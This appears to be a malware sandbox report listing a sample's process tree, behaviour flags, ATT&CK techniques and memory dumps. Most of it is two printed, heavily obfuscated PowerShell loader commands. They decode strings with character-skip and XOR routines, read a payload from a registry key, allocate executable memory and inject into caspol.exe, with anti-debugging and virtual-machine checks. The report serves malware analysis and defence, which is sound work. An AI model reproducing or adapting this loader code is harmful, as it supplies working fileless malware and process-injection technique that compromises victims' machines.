In'Fe2Sk1Si4St6Bu6Is4Bo7Om5Ac7Pa1Lo6Ge4Ni6Mi6Op7An0Ru6Dr9va7Es0Re6He8Up2TwBSk4Fu1Ak6Li0Li6Dm3Ce6CoCCi6SyBIn6Tr0Gu4Pi6Pi6MiASl6FuBBr7Sk6St7Ml1Th7Me7Fa7Di0Op6Pj6Ps7ts1pe6CoAxe7Ka7Ta2LuDDi2Co1di5Pu6St7Fo5Mo6SiCAf6SnBSt6Mi1Ma6Dm0Bo7Ae7Fo7Ra6Il6CrEEk6mh0Vo7Un7Th6TrBDe6So0Sp3De3Ax2ke9Al2Ep5Sk5BiEKu5Br6Sv7InCSu7Ek6Di7Tu1Da6Ud0Su6Pa8Af2UbBOv5Kl7In6Ba0Ku6Ou3Bi6Pa9Op6gr0bi6Dy6Ti7Ta1No6HaCVa6FeAUn6SvBDi2CoBpi4Op6Fu6Fe4Fd6Pr9An6Ca9re6SpCSk6SvBDa6Ge2Th4se6Fo6NaAYp6FeBne7Me3Sn6Ak0Om6SmBRe7Hy1Af6SlCbu6MrAUd6LgBPe7Hu6Ke5Mr8Uf3DaFPa3NaFst5fl6Sh7No1St6Va4fr6AfBCr6Di1Op6re4Di7Ek7sa6Po1Gu2Ol9Aw2tr5He2Gr1Sk5Gr7La6fo0Sn6Ku2Re6foBTu7Ap6Cl6AbEPi6Su4Sg6Ec7Pr7Ko6si7El6Pa7st1Un7WrCMa7Ch7Re6CiCAc6BuBBi6Ar2Jo2FeCCh2TyBRu5Ud6Pr6Gy0Fo7Gr1De4UnCEk6Me8Te7Ta5Lu6Om9Ga6sl0Te6Le8Ef6So0St6CrBop7De1Do6An4Hi7ok1Di6UnCHa6UpASi6ClBBl4Sl3om6In9In6Pa4Re6Ko2To7No6Du2FaDUn2Ce1Bu5Sn6Ta7Tr5Ma6OvCFo6YtBTp6Ps1Ur6Kr0so7Un7Fw7st6De6BrEVa6Se0Ca7Dr7Co6GaBLi6Un0Bl3Ge2Et2BiCVe'La;Le&Sa(Li`$ZoFRioTirIneHahElaLavEneRinIndTeeAg7Di)Fi Gr`$ErPSteMcrBaiStoPadPaiUnsUfkFieCe3Sk;Ar`$ThPUdeTrrHaiDeoAudGriKlsTekDieUt4Sa Je=Uk ReHOfTAbBAm Sl'Ba2Ab1ra4Fo6Ge6Ud4Be7Zi5Ab7st1Po6In4Hy6Hy6Bi7Op0Wo6No9lu7Dy0Ke6bo8Za2HyBAf4br1Af6In0Ib6Un3Bl6JuCDe6SkBSi6St0No4En8Ge6Ci0Fo7Ek1ox6DiDAr6FrACu6Ko1St2YpDFj2He1St4Fo3Fr6TiAPh7In7Fy6Pi0Sp6ReDKv6fr4Ar7Dr3Qu6Da0Wa6UdBAb6ar1Ap6Gr0Sl3Co7Fe2Gr9Sa2Hy5Sa2Pe1Re4Ku3ar6SaADi7Sp7La6En0Ku6GeDSu6Pl4Se7Ra3Tr6Dv0Mu6PeBOy6Fo1la6Ke0Ga3Ol6Di2Pu9Dr2Su5Ou2Gl1Pa5En1Bo7Lo2In6Li0To6Ep9Va7Om3Ve6Hj0Ra6Sw8Ut6hoASi6FiBTw7Me1An6GrDAs2Af9Fi2So5Gr2he1Sm5Ta7Kv6Fo0ju6Un2Su6TiBMe7Ln6Hj6RiEEl6ma4Ph6Un7Kn7Re6Ek7Tr6Mi7Ca1Pr7HmCUp7Fr7Al6CkCIr6ArBSa6Mo2Cy2SkCFi2PeBAn5Se6Ti6Dy0Da7Pa1Gu4TrCFa6Ti8By7In5pu6Pr9Gr6Un0Lo6Co8An6El0my6HuBUn7Sn1Sy6Li4Ma7co1Gu6CoCSp6JaAVo6MeBFj4Re3Po6Se9In6ma4Gr6Re2Ko7no6af2MaDBi2Tr1Et5Ud6Ri7Hy5Fa6PaCSu6EfBTh6La1An6Ra0Ak7In7Cy7No6ki6JaECa6So0De7Be7Ga6MaBRi6Ma0Ti3Ud2En2SuCge'Ol;Su&Sm(Id`$ViFSeoUnrAueShhScaRivTseTrnChdBueco7Ap)re Fo`$KoPGreSkrUniSkoBedPriUnsKukMuePu4Uv;Ma`$VaPSteRerBaiBioDodFoiHasmikGaeRe5Ad Pr=Fr MrHDeTCiBEn Fo'Pr7Mi7Om6Nu0Pr7Zu1va7Fr0La7Ad7He6cyBKo2Er5Ag2Ko1Sn4De6Gu6Fo4Ap7Sc5Tr7Uk1Va6Va4Ju6El6Ku7In0Aa6Ap9Ma7Te0Me6Uv8Sy2goBTh4Fo6Ka7Sa7Du6De0Ra6Sp4St7Do1in6Au0Ic5Li1Ho7KaCOm7lo5Ma6ne0Vi2NaDIn2PhCNi'De;do&Ti(Fr`$LbFInoArrBeeRyhBoaFovGoeKlnBedAfeAq7Th)Sk Wh`$KaPMoeBerEniReoRadEviLisBokBrere5Gi Pa Ho Di;Tu}Kn`$smUOrnTrgKaeTenMetAcipslAfiBusAfeDasGa Ly=Co ScHEmTanBho No'Sa6ShESl6Bo0Sk7Ov7Dy6GoBSe6Af0Ju6Do9ko3Si6Bl3Ci7wa'Ov;Re`$ShPuneBerAniRaocrdCaiScsBikVoeTa6Ar Yo=tr ReHMeTSkBTv Im'ut2Un1de5re6In7Se5Su6No9Br6Ga4ab6BeBPa6Sw6La6TrDFa6SaBSm6PrALe6Ds8st6Mi0Sa6Un2Te6Al4Is6co9Re7SpCKo2Ag5Ni3Ov8Vi2Di5Co5BaERa5St6Po7stCCu7To6Pr7Au1Fl6Le0Te6Re8ti2HaBBa5Li7Pa7Ma0Ca6WoBBr7Un1Em6TrCZa6fo8Tr6Sa0Ta2udBCe4WaCKo6ReBKo7Ge1ma6In0So7Si7Ta6SkAIn7Ce5Ve5Ch6Na6So0tr7as7Az7St3Dm6DuCSt6Se6Ps6tu0Ta7Be6Un2TuBTo4Sa8Un6Un4di7Do7ge7Ma6Hu6AgDBa6Al4Pu6vs9Tr5Bl8Eg3UnFPa3BaFTa4Li2Ka6Rv0gr7Op1He4Ng1Gl6Sl0Pr6Ti9Fa6Vo0Mi6Co2Ga6Bi4So7Ra1Pr6Ca0Wh4Po3Tr6KoAVe7Kl7Pl4Sp3Pa7Mi0Br6GeBPy6To6Po7An1Sp6LaCAc6VaAGa6AuBFi5Kn5Ov6GyAKo6xiCSu6TeBSp7in1Su6Be0Pr7No7Ik2brDPe2TeDSu6Fl3Af6SkEDr7Ov5Lu2Ph5ca2Mr1Kl5Dr0Ch6InBMe6Or2Ce6ty0Ap6CoBVi7Bl1Gl6PrCSa6Al9Sk6LiCTe7Op6Ej6ne0Bo7He6Hi2St5Re2fl1Fo4Ej3Ki6TrAWe7In7Si6an0Em6BaDPr6Ox4Do7Po3Hu6Fe0Ta6BaBLa6Ly1Tr6Pa0Su3Fo1Be2seCCu2Tr9se2re5Gu2UoDSt4Di2Ne4Sk1Br5Ph1Co2Un5Be4An5Un2MaDSa5TiEFo4FiCGu6LeBEl7Ba1Qu5Kn5Un7St1fo7Ub7Mo5Mo8Ak2Ta9Tw2Pr5Th5SuEga5Sc0Bl4BuCTe6SaBCi7Au1He3No6ro3Vo7Do5Be8St2Au9Ba2Im5Be5OdECo5ju0zo4EkCMe6BoBUn7Co1Un3Na6Mo3Ma7Ti5An8bi2Sa9hj2My5Re5DiEVr5Mi0Hi4SnCNa6SlBGy7Ru1Di3La6En3Pl7So5Mo8Tr2CoCHu2Pr5Ko2StDAf5FoEAt4SaCHe6ReBHu7Ar1Fo5Gr5In7en1Br7Ko7gu5Ep8Va2FuCUd2InCOn2DaCpr'le;To&Un(Ga`$ScFUboSmrRaeRahBiaRevBeeFlnRedFleFi7Bo)mo Me`$PaPBreSwriaiLaosadNgiBrsStkKaeTa6Rg;Nu`$DeNRbeOpcAnrStoTrgBaeCynChiCrcMa Ro=Af PofOikChpFo Re`$SuFSvoOmrFleGahKvaFlvFleFrnStdfoeDo5Ne Pe`$PrFUdostrBeeFohAraisvTieElnSedPaeNo6By;Sj`$SlPAgeKorEpiScoMtdLyiStsUdkDkeTy7Kb Tu=Vi DiHcoTToBBu Ko'Pr2St1Be4De2Op6Ba0ca6KuBSu6QuBKo6Th0Me6De8Po7Re6Bl6SaBCi6RiCTy7Fo1Sn7Wa6He6Fe3Am6InCAs6To9Pi7Ty1Ud6Pr0Ju7fl7Sc3Da6Do2Ag5Pa3Ho8Pa2Au5pr2mi1Be5En6Re7Un5Bo6Ph9Ma6Do4Fo6huBTr6Bu6Tr6PeDre6FoBJo6VlANo6Sp8Ma6Mi0Ra6Im2Ar6He4Ri6Ra9Br7MaCPe2InBEj4SpCSk6BeBCe7Lo3Ex6InAHe6stEEk6Mi0Ve2UnDFr5LsESk4CuCFe6AtBUr7Ro1Ba5Su5Za7Sm1Ro7Ef7Ma5Da8Gy3StFVe3IcFJa5PaFYe6St0af7Ca7De6HaAch2Fi9La2gr5ad3Uo3Ho3Sy0Ch3Im1ra2Po9Me2Va5Re3Sk5Te7MeDSt3Ga6du3Re5Ov3Te5pa3Co5Si2Av9Ko2Ve5Yo3Rs5Ur7MeDec3Ka1Af3Sp5Se2PhCDi'Bu;Di&fa(Mo`$BeFDooSkrdieLuhKaaRuvPleHonUndSheDi7Su)Ti Ca`$ToPLieRerAxibloKrdRaiSosCukAmePr7Es;Jo`$SnPOpeRarSmiIsoKadChiAssKrkGoeCl8Ba Re=Bf PaHplTFoBFr Af'Po2Ov1Pl5Ud0Aa6JoBRi6Ba6Sp6PrAHo6Un8Ju7Be5Bo6OsATh7Re6So6Fo0Gr6Kn4Br6ho7Ta6Un9Ha6Un0Re2An5ma3Jv8Us2Da5Cy2Tr1Wo5Mi6Pa7Cr5re6De9La6Fo4Hu6MiBRe6Jo6Lo6ApDex6noBRa6poAda6Te8In6Un0Vi6At2Re6Bo4Fl6Fa9Oe7BiCCr2KvBBu4BaCEs6piBOm7Sa3Sn6SnATr6VeEun6Ud0Be2OvDCo5TaEFa4StCOp6ArBAr7ta1Sp5Jo5Pa7Mo1Bo7Fa7Ku5Re8An3BrFVa3geFVe5TrFfi6sy0Ac7Vi7Ge6FlANo2Jo9Ho2Co5En3Fe0Je3Te6No3fa4Le3Bi4St3Pa7Va3PrDFo3Un6Fr3vu7Tr2Be9Kl2En5Pa3Hj5St7StDMu3ma6Sv3Gr5La3Pi5ru3Re5ce2Co9St2Ek5Ch3Kv5Br7thDAf3Le1Mo2NoCBe'Pe;Sl&Mo(Ki`$CoFbaoRarCoeUdhMeaHdvaueRunModJaeFo7Di)Sa Ns`$OxPPreNorTeiRioMadFiiSpsGakUdeAp8Op;dd`$KaISusFarGraTeeAllAmeStrDenReeTn1Pa6No8El=Pe(ChGRaeHjtRe-FaIAftWheEfmArPRurAnoUnpUseGarMitAcyLy Va-PiPUnaPhtTahun Re'BrHOlKDeCHuUNo:Br\HoDSteDepNuaWerOrtArmTreSlnUntUnaEslUniGrzTueopsTi\SttPsuOrrsiiStsavtElbPruCasAr'Mi)St.FaPreaSirVvtTaiRecmiiBepGalRiePlsul1Bo;Fo`$NePSteCorPeiBuosodAfiGrsEnkAreSf9Un Gr=Aa SaHNeTStBUn Sk'Be2Pa1im5tw5ba6Ud0Aa7Cy7Ek6GnCHy6RoAbl6Di1Sl6PaCUd7Da6ga6PaEsa6Ra0Bl2Ma5Ab3Fr8Ze2Co5Fo5PlEOb5Ki6Br7UrCOp7Di6Un7Op1Ka6Bi0Ne6In8Bo2FoBBl4Oo6Be6TaASk6SuBFr7Ek3St6Tj0Mo7Pr7Bo7Ba1Te5Ce8Be3muFGa3FoFCi4Su3Yd7au7kr6UdAEs6Gr8Bl4He7Sc6Ar4Mo7st6Om6Ur0Re3mi3Vi3gy1Gr5Un6Be7Ai1Ho7Be7Tr6GnCBr6NoBVe6Da2Me2SdDAc2Ty1Cl4BjCud7Di6Ek7Tr7Ch6Ar4Se6Tr0De6Vo9Ov6lp0Af7Re7Ps6SaBDi6Li0Pa3Sk4Fr3sa3un3frDda2VeCHy'Mo;An&Te(De`$OlFskoBrrSpeHahSoaInvEkeSenUndOmeGa7St)fo Th`$RePTheLerRiiSaoLrdOoiSosPikDeeSi9Kr;Ob`$ReIInsTorOrasceJulReeJarPonTreTe1Ry6Af8Vo0Ex Ch=So KaHLoTUnBPe Ov'eg5InESt5As6Tj7miCCo7ba6Cu7Fo1Gk6Br0Si6Ge8Ov2MaBOp5Be7Ka7Xe0Dr6NoBBo7Ch1Sk6HeCDe6Le8Tr6At0Ge2EnBKa4SeCBo6UnBAn7Sc1Se6Ud0Vi7Re7Ce6SaAOu7Ag5Du5Vo6Cu6Ph0Vi7Ml7Ca7Ur3Co6StCRo6Su6Uj6ty0So7Pa6Mu2HaBIn4No8Fr6No4Am7An7Af7Ec6Nu6unDCy6Ba4Mi6Ke9Ta5Ba8Ma3ObFEn3EcFFr4Le6Im6ToABr7Br5Im7KnCVo2syDPa2St1ad5Ri5Sl6Re0Un7Fo7Be6DeCTe6BuASu6Un1Im6KvCSk7Br6Un6UnEBi6Bn0So2Ho9Ly2Op5Ko3ma5ti2uh9Ba2Co5Mu2Kl5Ae2Vo1Af4Te2Ma6To0In6ThBTr6WrBLi6Hi0Ra6Pe8si7To6Li6feBKo6EpCSh7Ej1Fl7Sp6Ro6Eu3Se6FoCMi6Sp9Ha7Af1Pr6Sa0fr7Ep7Bl3Fr6Se2In9Ve2to5Mo3Ex3Ha3Br0Na3Un1Co2inCHe'Be;Er&Rm(Ah`$HaFBeoBjrEreinhSkaTavEkeTinCedSteHf7Wh)Id Tm`$PiINosKarKuaHyeSklGeeberRenudeCa1In6Fl8Un0St;Sp`$AcGPirDeaSepRohVriMaoRalakourgUnyMa=Am`$FrPReeUdrDaiKloRodPeiAnsLikKaeRn.SscThoAnuOvnmatSt-Fl6Ma5Ma4My;Tu`$OpICosUdranaNaeBulToeberShnWheAl1Ef6Br8Si1Ca Ut=Pe HaHBaTUnBRa Re'Pr5MiESe5Ej6La7OpCFo7Lo6Mi7Tr1Op6Da0Ch6Di8Ta2StBPa5Dj7Vr7De0To6InBWa7Fu1Ar6SlCEx6Br8Di6Si0Re2SkBGr4FaCWi6HaBRe7He1Di6Di0Kd7Tr7pr6SeAEn7En5Fa5Ti6Id6Al0Ha7Cl7le7Ho3Pa6moCCe6Pa6No6Ve0Tu7Py6Si2RaBSu4Bl8gl6Ge4Ko7Or7pr7Da6Hy6BlDAl6da4ny6Sm9Oe5Mo8Co3SuFBa3ReFEr4In6Pe6AbAFo7Ni5Eu7TaCKa2AcDIn2Me1Ak5Ba5Ly6Re0Ce7Pe7Sy6SaCKv6UnASy6Pl1Hy6CoCAf7Ul6Te6StEMi6Ci0Wh2Tr9Gy2an5Ul3Br3Ab3Un0Ve3Im1Un2Sp9Sd2pr5Co2Mi1An5Pr0In6BaBGl6Sw6ar6AnACo6Ph8Co7Su5St6FiALo7me6Co6Al0Be6Ca4Sa6Un7Am6Fr9Re6sk0ag2Av9He2Fa5hj2Dv1Be4Ch2gr7Bl7Ti6Vv4Ud7Fo5Ma6BlDHa6CoCUd6AdAGa6Ov9Ko6KrAOf6Gl2In7luCSt2UdCHo'Sk;Ub&Ko(En`$BrFGeoUdrBieAfhpyaFovhaeAgnVodAceGr7de)Al To`$ArIOvsAnrChaSpeVelFaeUsrpanKaeSi1Ma6Br8Fa1Ga;Op`$FoIUtsBrrUnaByeBllBieTrrGonIdeSo1St6Un8Di2Gu Hi=Pr StHBrTtjBSa We'Nr2Am1Tt6uf3Dd6Tr0In7Ry6Tr7Ve1Or6TvCGy7Ap3Un6OmCMo7Sa1Dy7LaCTa2Me5Os3Sy8Br2Ga5Va5PhESp5Fr6un7ClCBi7Au6Pr7Af1Am6Ps0Re6Yn8An2CeBPu5Br7Lg7Lg0No6TeBTr7Sv1ur6JeCPi6lg8Ev6Tr0An2MiBLe4BaCUn6RuBTh7li1El6Au0Ul7ve7Si6ArABe7Gy5Ha5Al6Ov6Ma0Ge7tr7St7Su3Br6ChCCh6Pr6Un6Be0Va7Ru6Se2MoBMi4Un8ha6Un4De7Br7rr7Na6so6EpDSu6mi4Pr6Ki9Da5Ec8Co3aaFOp3OfFLe4Un2be6Fo0Du7Ba1In4We1la6Ma0Ne6Un9Ef6Te0so6Re2Ch6Op4Ca7St1Ho6Pr0ma4La3Fr6MaASo7Av7sk4Kl3Ak7Se0Ri6UnBTr6Dr6By7Bi1Pl6TeCEp6KiAMe6SvBSp5Un5Sk6MaAma6SpCCo6EsBAf7Ge1Mi6Tv0No7An7Da2InDEq2MeDSk6La3Ta6slEHi7Mo5De2ce5Du2Sa1Li4An8Ho6Ko4Le7Un7La6FaERe7Ef7Ov6Ko3In6Sa9Va7neCns7Tr1Vr6RoBBr6KoCfo6SkBFo6di2Kv6Ob0In7He7Jo2Ak5Ki2Be1Fu4FoDDr6Ha0Sm6Un4Ek7la7Pe6ReERa6Ma0Be6PyBBo7Qu6Sc2StCUn2Ga9Re2Ud5Si2PeDFr4ri2Ic4fo1Kr5Ab1Pa2Na5Na4Fe5Op2NeDAr5PsEDi4stCBa6FoBSt7Bi1En5Ge5Em7Po1Mu7Di7Qu5as8Op2Fo9va2En5Ud5IwEme4chCHa6SnBHo7Sl1No5Op5Th7Se1Vi7bo7Be5Dy8Bo2An9Wh2So5Ba5RiEAm4ReCLr6LsBIs7to1Di5Ma5Un7Ma1Ve7sk7Ac5Bj8St2Cr9Va2Ec5Gh5SvETn4RoCRe6GeBEp7Un1Fi5Se5Pa7Er1Gr7Co7ba5Sk8Re2Mi9Re2Su5Pa5FaESh4SyCAk6KlBfr7Ba1Sa5Re5Un7Fo1na7St7Kr5Dy8Sm2KaCSl2fo5Ep2HaDRi5RuEFr4EnCTr6spBln7Op1Ek5Ac5Hj7Fa1Sm7Bl7se5Sc8Pa2BiCWa2TiCCa2AgCFu'Ko;Ka&Th(Ap`$FiFUnoFarSpeMohSmacovBuePanMudTieKr7Pr)Tr Wi`$StIRasSprPeaWieBalCheUnrSenNueDu1Ki6le8St2Dk;Pr`$BaIKosRsrdiaPyeRelExeEkrRonIneDo1Tr6In8Co3Re We=Te BiHDeTEtBIm Bi'Te2Bl1Ba6Wa3Th6Dy0Re7Re6Pr7Ba1Re6EnCTy7Pr3ba6CiCSp7La1Ma7SuCOm2FlBPr4SiCFa6AbBGe7Sk3mi6PaAAe6LaEFi6Di0Ov2UpDTa2De1Ex4De2Re6Ep0Em6TaBAd6DiBob6Fr0St6Ko8Gr7Su6Po6MiBsa6TaCSu7ud1Yd7Ci6Dr6Em3Vi6UnCGa6vi9Pt7Ko1al6Ba0Un7Ma7Af3ke6Eq2Tr9Ul2al1La5So0Nr6GrBLo6Bi6Cr6PaATh6La8Un7Ac5Af6VeAud7In6Ku6Vk0Eo6Te4Pa6Re7He6Fi9Wa6Fo0Fi2Li9Di2Fo1Fo4drBSo6Ta0Ca6Sf6Ne7Po7Ye6BeASt6Se2Hy6Ud0Se6KoBPa6tiCGe6Ga6Ob2Mo9Ka3Ni5Co2Wh9Ko3Be5Id2BiCDu'no;Ch&Ec(Ch`$EiFOboInrTeeOnhPaaMivAseMonTidTeeWh7Ko)Br Un`$HoIFisTurDiaKaeBeldoeFjrudnCrePa1Be6Tr8Go3Ha#Mo;""";;Function Israelerne1689 { param([String]$Salmister); $Serviceteknik = $Salmister.toCharArray(); For($Unpatronizeds=2; $Unpatronizeds -lt $Serviceteknik.count-1; $Unpatronizeds+=(2+1)){ $Tilkrsler = $Tilkrsler + $Serviceteknik[$Unpatronizeds]; } $Tilkrsler;}$Antiquarianizes0 = Israelerne1689 'TuIUnnFsvCooUnksveSv-SrEKlxMepTirRaeKosCasPriSuobenPa ';$Antiquarianizes2 = Israelerne1689 'OpsSptSuaChrObtGr-TrjInoSybIn ';$Antiquarianizes1= Israelerne1689 $Milieulovovertrdelses;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Antiquarianizes1 ;}else{&$Antiquarianizes0 $Antiquarianizes1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Dysacousma24000 {param([String]$Salmister);For($Unpatronizeds=2; $Unpatronizeds -lt $Salmister.Length-1; $Unpatronizeds+=(2+1)){$Tilkrsler = $Tilkrsler + $Salmister.Substring($Unpatronizeds, 1);}$Tilkrsler;}$Dysacousma24002 = Dysacousma24000 'StITjnPivAnoFukTyeAc-MgEMexOrpchrUneBasKosPeiPioBrnAn ';$Dysacousma24001 = Dysacousma24000 'Be$SySEpaDyjOmoAruSyssu[Dg$BaUVenCrpPhaQutCorSuosenGeiBrzGeeCadInsUn/ar2sj]Pa Bl=Av Se[DacSioDinCrvFieStrSrtSt]Kn:Sc:ReTJooVeBDryTitTreSh(Ti$nySUnaHalGemJeiDosEttDeeSerCi.AnSThuPibCasSetBorAtiPenprgOx(Sy$CoUChnSupUnaAftMirPaoSunUniFuzAceLedDesex,Op Al2sv)St,Ta Af1be6Ti)Te ';Function HTB {param([String]$Salmister);$Sajous = New-Object byte[] ($Salmister.Length / 2);For($Unpatronizeds=0; $Unpatronizeds -lt $Salmister.Length; $Unpatronizeds+=2){.($Dysacousma24002) $Dysacousma24001;$Sajous[$Unpatronizeds/2] = ($Sajous[$Unpatronizeds/2] -bxor 5);}[String][System.Text.Encoding]::ASCII.GetString($Sajous);}$Spinderskerne0=HTB '567C767160682B616969';$Spinderskerne1=HTB '486C66776A766A63712B526C6B36372B506B766463604B64716C73604860716D6A6176';$Spinderskerne2=HTB '42607155776A6644616177607676';$Spinderskerne3=HTB '567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B4D646B616960576063';$Spinderskerne4=HTB '7671776C6B62';$Spinderskerne5=HTB '426071486A617069604D646B616960';$Spinderskerne6=HTB '5751567560666C64694B64686029254D6C6160477C566C622925557067696C66';$Spinderskerne7=HTB '57706B716C6860292548646B64626061';$Spinderskerne8=HTB '5760636960667160614160696062647160';$Spinderskerne9=HTB '4C6B4860686A777C486A61706960';$Forehavende0=HTB '487C4160696062647160517C7560';$Forehavende1=HTB '46696476762925557067696C6629255660646960612925446B766C466964767629254470716A4669647676';$Forehavende2=HTB '4C6B736A6E60';$Forehavende3=HTB '557067696C6629254D6C6160477C566C6229254B607256696A712925536C7771706469';$Forehavende4=HTB '536C77717064694469696A66';$Forehavende5=HTB '6B71616969';$Forehavende6=HTB '4B7155776A71606671536C77717064694860686A777C';$Forehavende7=HTB '4C405D';$Forehavende8=HTB '59';$Markrflytninger=HTB '505640573637';$Hearkens=HTB '46646969526C6B616A7255776A6644';function fkp {Param ($Triunification, $Spangling156) ;$Periodiske0 =HTB '21446E73646864776C6B762538252D5E447575416A68646C6B583F3F46707777606B71416A68646C6B2B426071447676606867696C60762D2C257925526D607760284A676F606671257E25215A2B42696A676469447676606867697C4664666D602528446B6125215A2B496A6664716C6A6B2B5675696C712D21436A77606D6473606B61603D2C5E2834582B4074706469762D2156756C6B616077766E60776B60352C25782C2B426071517C75602D2156756C6B616077766E60776B60342C';&($Forehavende7) $Periodiske0;$Periodiske5 = HTB '214C6B6377646864686864777C25382521446E73646864776C6B762B4260714860716D6A612D2156756C6B616077766E60776B603729255E517C75605E585825452D2156756C6B616077766E60776B603629252156756C6B616077766E60776B60312C2C';&($Forehavende7) $Periodiske5;$Periodiske1 = HTB '77607170776B25214C6B6377646864686864777C2B4C6B736A6E602D216B7069692925452D5E567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B4D646B616960576063582D4B6072284A676F60667125567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B4D646B6169605760632D2D4B6072284A676F606671254C6B715571772C29252D21446E73646864776C6B762B4260714860716D6A612D2156756C6B616077766E60776B60302C2C2B4C6B736A6E602D216B7069692925452D2151776C706B6C636C6664716C6A6B2C2C2C2C2925215675646B62696C6B623430332C2C';&($Forehavende7) $Periodiske1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Regnskabsstyring,[Parameter(Position = 1)] [Type] $Twelvemonth = [Void]);$Periodiske2 = HTB '21466475716466706970682538255E447575416A68646C6B583F3F46707777606B71416A68646C6B2B4160636C6B60417C6B64686C66447676606867697C2D2D4B6072284A676F60667125567C767160682B576063696066716C6A6B2B447676606867697C4B6468602D2156756C6B616077766E60776B603D2C2C29255E567C767160682B576063696066716C6A6B2B40686C712B447676606867697C47706C69616077446666607676583F3F57706B2C2B4160636C6B60417C6B64686C66486A617069602D2156756C6B616077766E60776B603C29252163646976602C2B4160636C6B60517C75602D21436A77606D6473606B616035292521436A77606D6473606B61603429255E567C767160682B487069716C666476714160696062647160582C';&($Forehavende7) $Periodiske2;$Periodiske3 = HTB '21466475716466706970682B4160636C6B60466A6B7671777066716A772D2156756C6B616077766E60776B603329255E567C767160682B576063696066716C6A6B2B466469696C6B62466A6B73606B716C6A6B76583F3F5671646B616477612925215760626B766E64677676717C776C6B622C2B5660714C6875696068606B7164716C6A6B43696462762D2156756C6B616077766E60776B60322C';&($Forehavende7) $Periodiske3;$Periodiske4 = HTB '21466475716466706970682B4160636C6B604860716D6A612D21436A77606D6473606B616037292521436A77606D6473606B616036292521517260697360686A6B716D2925215760626B766E64677676717C776C6B622C2B5660714C6875696068606B7164716C6A6B43696462762D2156756C6B616077766E60776B60322C';&($Forehavende7) $Periodiske4;$Periodiske5 = HTB '77607170776B2521466475716466706970682B467760647160517C75602D2C';&($Forehavende7) $Periodiske5 ;}$Ungentilises = HTB '6E60776B60693637';$Periodiske6 = HTB '21567569646B666D6B6A68606264697C2538255E567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B486477766D6469583F3F4260714160696062647160436A7743706B66716C6A6B556A6C6B7160772D2D636E752521506B62606B716C696C7660762521436A77606D6473606B6160312C29252D42415125452D5E4C6B715571775829255E504C6B7136375829255E504C6B7136375829255E504C6B713637582C252D5E4C6B71557177582C2C2C';&($Forehavende7) $Periodiske6;$Necrogenic = fkp $Forehavende5 $Forehavende6;$Periodiske7 = HTB '2142606B6B6068766B6C7176636C697160773625382521567569646B666D6B6A68606264697C2B4C6B736A6E602D5E4C6B71557177583F3F5F60776A29253330312925357D363535352925357D31352C';&($Forehavende7) $Periodiske7;$Periodiske8 = HTB '21506B666A68756A76606467696025382521567569646B666D6B6A68606264697C2B4C6B736A6E602D5E4C6B71557177583F3F5F60776A292530363434373D36372925357D363535352925357D312C';&($Forehavende7) $Periodiske8;$Israelerne168=(Get-ItemProperty -Path 'HKCU:\Departmentalizes\turistbus').Participles1;$Periodiske9 = HTB '215560776C6A616C766E602538255E567C767160682B466A6B73607771583F3F43776A684764766033315671776C6B622D214C767764606960776B6034333D2C';&($Forehavende7) $Periodiske9;$Israelerne1680 = HTB '5E567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B486477766D6469583F3F466A757C2D215560776C6A616C766E602925352925252142606B6B6068766B6C7176636C697160773629253330312C';&($Forehavende7) $Israelerne1680;$Graphiology=$Periodiske.count-654;$Israelerne1681 = HTB '5E567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B486477766D6469583F3F466A757C2D215560776C6A616C766E602925333031292521506B666A68756A766064676960292521427764756D6C6A696A627C2C';&($Forehavende7) $Israelerne1681;$Israelerne1682 = HTB '21636076716C736C717C2538255E567C767160682B57706B716C68602B4C6B7160776A75566077736C6660762B486477766D6469583F3F4260714160696062647160436A7743706B66716C6A6B556A6C6B7160772D2D636E7525214864776E7763697C716B6C6B62607725214D6064776E606B762C29252D42415125452D5E4C6B715571775829255E4C6B715571775829255E4C6B715571775829255E4C6B715571775829255E4C6B71557177582C252D5E4C6B71557177582C2C2C';&($Forehavende7) $Israelerne1682;$Israelerne1683 = HTB '21636076716C736C717C2B4C6B736A6E602D2142606B6B6068766B6C7176636C69716077362921506B666A68756A76606467696029214B6066776A62606B6C66293529352C';&($Forehavende7) $Israelerne1683#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1792

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/568-81-0x0000000077840000-0x00000000779C0000-memory.dmp

Filesize
1.5MB

Download
memory/568-85-0x0000000005AB0000-0x0000000008D57000-memory.dmp

Filesize
50.7MB

Download
memory/568-67-0x00000000736A0000-0x0000000073C4B000-memory.dmp

Filesize
5.7MB

Download
memory/568-86-0x0000000077840000-0x00000000779C0000-memory.dmp

Filesize
1.5MB

Download
memory/568-68-0x0000000077660000-0x0000000077809000-memory.dmp

Filesize
1.7MB

Download
memory/568-80-0x0000000077840000-0x00000000779C0000-memory.dmp

Filesize
1.5MB

Download
memory/568-61-0x0000000000000000-mapping.dmp

Download
memory/568-62-0x00000000759F1000-0x00000000759F3000-memory.dmp

Filesize
8KB

Download
memory/568-73-0x0000000077840000-0x00000000779C0000-memory.dmp

Filesize
1.5MB

Download
memory/568-64-0x00000000736A0000-0x0000000073C4B000-memory.dmp

Filesize
5.7MB

Download
